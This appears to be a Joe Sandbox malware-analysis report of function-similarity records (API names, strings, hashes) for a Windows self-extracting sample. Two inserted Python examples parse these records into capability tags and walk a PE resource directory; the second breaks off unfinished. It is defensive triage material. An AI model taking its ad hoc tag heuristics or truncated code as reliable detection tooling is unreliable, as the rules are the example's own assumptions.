                                                                                                                • Instruction ID: ae25ab8ea4e0221e45e6fb5d80d0c4092434cfa36e300e907e88adc097f778e6
                                                                                                                • Opcode Fuzzy Hash: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                                                • Instruction Fuzzy Hash: 2371A421E0878686FB528B25AA003B866A0AF99754F148270DF6DD77D5FF3EF44587C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                • String ID: 124
                                                                                                                • API String ID: 3785188418-372045425
                                                                                                                • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                                                • Instruction ID: 8d54a1a7b86a55f5a9ec5b84d7da8b1430aa448ea01055b4d0fc466b236418e2
                                                                                                                • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                                                • Instruction Fuzzy Hash: 89311E75908642D6EB105B25AA442B87A61FB8AB65F54D230CB3EC23D4FF3EB149C7C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                • Opcode ID: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                                                • Instruction ID: e9921b1231c5fe6e05ff1cb336fdcfce92972e499e60717921d2212513f2cdd4
                                                                                                                • Opcode Fuzzy Hash: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                                                • Instruction Fuzzy Hash: 08518D36A08A819AEB218B249540179B7A0FB89B54F558131DB6DC37C4FF3EF444CBC4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                                                • Instruction ID: 85eac65bd30fd1c84954f2257f00a470bff5842506ffa24ae85fc76128bf4cf7
                                                                                                                • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                                                • Instruction Fuzzy Hash: A2314832608B858AE7108F16F4441AABBA0FB89B80F459139EF5E83754FF3DE045CB80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                • String ID:
                                                                                                                • API String ID: 975904313-0
                                                                                                                • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                                                • Instruction ID: 6d305b49aa6da1b94e38bc6c4ed87d7f833861045500a46dc401131fbd44d1d9
                                                                                                                • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                                                • Instruction Fuzzy Hash: 2D719E61A0D6C585FF628F2496103B86A90AF4AB90F488131DBBEC67D1FF2EB40583D1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156179360-0
                                                                                                                • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                                                • Instruction ID: f5431a6ef42e3931de76705d50cd5a45cad1a6d50238068a73296ef42451c78b
                                                                                                                • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                                                • Instruction Fuzzy Hash: 85615B72A086429AEB608B1596052B83BA5FF05794F14C571EF29D3794FF3AF885C7C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 2212493051-0
                                                                                                                • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                                                • Instruction ID: 2d8bc936a2da14eb31f5b350733970678649bfb92e410ed1d7f1dfd19bbd0755
                                                                                                                • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                                                • Instruction Fuzzy Hash: 58318F36B146118AE7108B65E904ABD7BA0F749B99F599130CF2A93B84EF39F4458B80
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF6FD213261), ref: 00007FF6FD214085
                                                                                                                • LocalFree.KERNEL32 ref: 00007FF6FD214108
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: LoadStringA.USER32 ref: 00007FF6FD214FBC
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: MessageBoxA.USER32 ref: 00007FF6FD214FFC
                                                                                                                  • Part of subcall function 00007FF6FD217958: GetLastError.KERNEL32 ref: 00007FF6FD21795C
                                                                                                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF6FD213261), ref: 00007FF6FD21412E
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF6FD213261), ref: 00007FF6FD21418F
                                                                                                                  • Part of subcall function 00007FF6FD217D28: FindResourceA.KERNEL32 ref: 00007FF6FD217D52
                                                                                                                  • Part of subcall function 00007FF6FD217D28: LoadResource.KERNEL32 ref: 00007FF6FD217D69
                                                                                                                  • Part of subcall function 00007FF6FD217D28: DialogBoxIndirectParamA.USER32 ref: 00007FF6FD217D9F
                                                                                                                  • Part of subcall function 00007FF6FD217D28: FreeResource.KERNEL32 ref: 00007FF6FD217DB1
                                                                                                                • LocalFree.KERNEL32 ref: 00007FF6FD214168
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                • String ID: <None>$LICENSE
                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                • Opcode ID: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                                                • Instruction ID: 3071374a43778f3234a3f4ebcc92f8ff374517786043c61a5416568756b73424
                                                                                                                • Opcode Fuzzy Hash: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                                                • Instruction Fuzzy Hash: CA310331A19616CAE7209B20EA5177A6A60EB89749F44C535DA2DC76D0FF7EF0058AC0
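The entries above are the Joe Sandbox IDA plugin's per-function similarity records: one "Similarity" block per function, carrying an API ID (concatenated fragments of the Win32 API names the function calls), a String ID (the strings it references), a combined API String ID, and 64-hex-digit Opcode and Instruction IDs. The following Python is an added example, not part of this report and not Joe Sandbox code: it parses such records and tags each function with the capability a triager would note from the API and string fragments (dynamic API resolution through LoadLibrary/GetProcAddress, the CheckTokenMembership administrator check, registry lookups, and unpacking of data carried in PE resources). The three records embedded as sample text are copied from this section; reading `$` in the API ID as a tier separator and CamelCase boundaries as token boundaries, and the tag rules themselves, are assumptions of the example rather than documented Joe Sandbox semantics.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three "Similarity" records copied from the report above,
# with page indentation and the Memory Dump Source lines left out.
SAMPLE = """\
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
• Instruction ID: 85eac65bd30fd1c84954f2257f00a470bff5842506ffa24ae85fc76128bf4cf7
Similarity
• API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
• String ID: Software\\Microsoft\\Windows\\CurrentVersion\\App Paths
• API String ID: 229715263-2428544900
• Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
• Instruction ID: f500d763d697613f838b24801c4bf13f57636d0d928221c7199c2055432b10a7
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
• Instruction ID: 3071374a43778f3234a3f4ebcc92f8ff374517786043c61a5416568756b73424
"""

BULLET = "\u2022 "  # the "• " marker in front of every field line
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
          "Opcode ID": "opcode_id", "Instruction ID": "instruction_id"}
SHA256_HEX = re.compile(r"^[0-9a-f]{64}$")


@dataclass
class FuncRecord:
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    tags: set = field(default_factory=set)

    @property
    def strings(self) -> list:
        # '$' separates the referenced strings; an empty String ID yields [].
        return [s for s in self.string_id.split("$") if s]

    def ids_look_valid(self) -> bool:
        return bool(SHA256_HEX.match(self.opcode_id) and SHA256_HEX.match(self.instruction_id))


def split_api_id(api_id: str) -> list:
    """Split 'FreeLibrary$AddressAllocateInitializeLoadProc' into word tokens.
    Assumption: '$' separates frequency tiers, each tier concatenating CamelCase
    fragments of API names. Lowercase CRT names (lstrcmp, memcpy_s) fuse with the
    preceding fragment; the tag rules below do not rely on them."""
    tokens = []
    for tier in api_id.split("$"):
        tokens.extend(re.findall(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*", tier))
    return tokens


def parse_records(text: str) -> list:
    """Collect the per-function 'Similarity' records from report text."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Similarity":
            current = FuncRecord()
            records.append(current)
            continue
        if current is None or not line.startswith(BULLET):
            continue
        key, _, value = line[len(BULLET):].partition(":")
        attr = FIELDS.get(key.strip())
        if attr:
            setattr(current, attr, value.strip())
    return records


def tag_record(rec: FuncRecord) -> set:
    """Heuristic capability tags (rules of this example, not Joe Sandbox signatures)."""
    toks, strs = set(split_api_id(rec.api_id)), rec.strings
    # LoadLibrary + GetProcAddress fragments, or a DLL name among the strings
    if {"Load", "Proc", "Address"} <= toks or any(s.lower().endswith(".dll") for s in strs):
        rec.tags.add("dynamic-api-resolution")
    # CheckTokenMembership is the documented way to test BUILTIN\Administrators membership
    if "CheckTokenMembership" in strs:
        rec.tags.add("admin-token-check")
    # RegOpenKey / RegQueryValue fragments, or a well-known registry path
    if {"Open", "Query", "Value"} <= toks or any(s.startswith(("Software\\", "Control Panel\\")) for s in strs):
        rec.tags.add("registry-query")
    # FindResource / LoadResource / LockResource: payload or data kept in PE resources
    if "Resource" in toks and {"Find", "Load", "Lock"} & toks:
        rec.tags.add("resource-unpacking")
    return rec.tags


def triage(text: str) -> list:
    """(API String ID, sorted tags) per record, in report order. The API String ID
    pairs two hashes; treating it as a key for grouping functions is an assumption."""
    return [(r.api_string_id, sorted(tag_record(r))) for r in parse_records(text)]


if __name__ == "__main__":
    for api_string_id, tags in triage(SAMPLE):
        print(f"{api_string_id:>22}  {', '.join(tags) or '-'}")
```

Run against a full report export, the same parser works on every record in the section; the tag rules are deliberately conservative (a CheckTokenMembership string alone is enough for the admin-check tag, but a registry tag needs the Open/Query/Value trio or a known key path) so that common dialog and string-handling helpers do not light up.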
                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD2179BB
                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD2179CA
                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD217A1A
                                                                                                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD217A4E
                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD217A67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Free$FindLoadLock
                                                                                                                • String ID: UPDFILE%lu
                                                                                                                • API String ID: 3629466761-2329316264
                                                                                                                • Opcode ID: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                                                • Instruction ID: 7ab261a833e17306512e920714a025f8c972c14ee33504a540a4b6e857c0699a
                                                                                                                • Opcode Fuzzy Hash: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                                                • Instruction Fuzzy Hash: A8315E32A08A41C6E7108B25A50017ABAA0FBC9B54F558235DB6EC33D5FF3EF504C6C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3370778649-0
                                                                                                                • Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                                                • Instruction ID: b78deef8c9c61cd74503338141bc24d4d85a6db4edf5f957bfef6a4a468d2da9
                                                                                                                • Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                                                • Instruction Fuzzy Hash: 0B111D31B09B4187E7145B62A60407DAAA0EB4EFC1F48D474DE2EC3794FF3EE4418680
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                • String ID: wininit.ini
                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                • Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                                                • Instruction ID: 4a1e9c4b4f93cd371ee1e6b5c07ded06af66314c8b125d5694a896128dc4e3c5
                                                                                                                • Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                                                • Instruction Fuzzy Hash: 5D113032604A8187E7108B25E5542AAB6A1FBCD715F85C131DB6EC3694FF3DE549CA80
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                • String ID: 124
                                                                                                                • API String ID: 761066910-372045425
                                                                                                                • Opcode ID: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                                                • Instruction ID: 24afc74338f338982d22bc8100adda619fdcb78741f61e795a8cee7951d38b22
                                                                                                                • Opcode Fuzzy Hash: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                                                • Instruction Fuzzy Hash: 10113070D08642D6FB142B61AA443B96A52FB8AB41F84D170CA2ED23D4FF7EB44987C0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6FD2134BA), ref: 00007FF6FD214A7D
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6FD2134BA), ref: 00007FF6FD214B19
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: LoadStringA.USER32 ref: 00007FF6FD214FBC
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: MessageBoxA.USER32 ref: 00007FF6FD214FFC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                • String ID: <None>$@$FINISHMSG
                                                                                                                • API String ID: 3507850446-4126004490
                                                                                                                • Opcode ID: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                                                • Instruction ID: aaaab546ba099eb8c4903210af40bcd0e58eaf387ac6d06072b0b2a65819927e
                                                                                                                • Opcode Fuzzy Hash: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                                                • Instruction Fuzzy Hash: 6E119F72A0824287F7208B20A55077A76A0EB89789F44D135DF6DC6BC4FF3EE1058BC0
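The record above shows the complete extraction chain the stub runs per embedded item: FindResourceA, SizeofResource, LoadResource, LockResource, memcpy_s, FreeResource, with the resource names LICENSE, UPDFILE%lu and FINISHMSG seen in the String IDs, a temp directory of the form IXP000.TMP and a LoadLibrary of advpack.dll elsewhere in this listing. Taken together these are the hallmarks of a Windows IExpress self-extracting stub, which is an inference from the strings, not something the report states. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it walks a PE resource directory by hand, which is exactly the lookup FindResource performs, so the named entries a stub will extract can be listed statically before anything is run. The blob it parses is constructed inline for the demo (one RT_RCDATA type, two named entries, language 0x409); mapping the data RVA to a file offset through the section table is left as a comment because the demo has no section table.

```python
"""Walk a PE .rsrc directory to list named resources.

Added example, not part of the Joe Sandbox report. The tree has three
levels (type -> name -> language); a directory entry whose high bit is set
points to a subdirectory, otherwise to an IMAGE_RESOURCE_DATA_ENTRY. Names
are IMAGE_RESOURCE_DIR_STRING_U: a u16 character count then UTF-16LE.
"""
import struct
from typing import Iterator, List, NamedTuple, Optional, Tuple, Union

RT_RCDATA = 10            # resource type used for raw binary blobs
SUBDIR_FLAG = 0x80000000  # high bit of an entry field: offset is a subdirectory / string


class Resource(NamedTuple):
    rtype: Union[int, str]
    name: Union[int, str]
    lang: int
    data_rva: int   # RVA of the payload; in a real PE map it through the .rsrc section header
    size: int


def _read_name(rsrc: bytes, off: int) -> str:
    """Decode an IMAGE_RESOURCE_DIR_STRING_U at `off` (relative to the .rsrc start)."""
    (n,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2: off + 2 + 2 * n].decode("utf-16-le")


def _entries(rsrc: bytes, dir_off: int) -> Iterator[Tuple[Union[int, str], int]]:
    """Yield (name_or_id, offset_field) for every entry of the directory at `dir_off`."""
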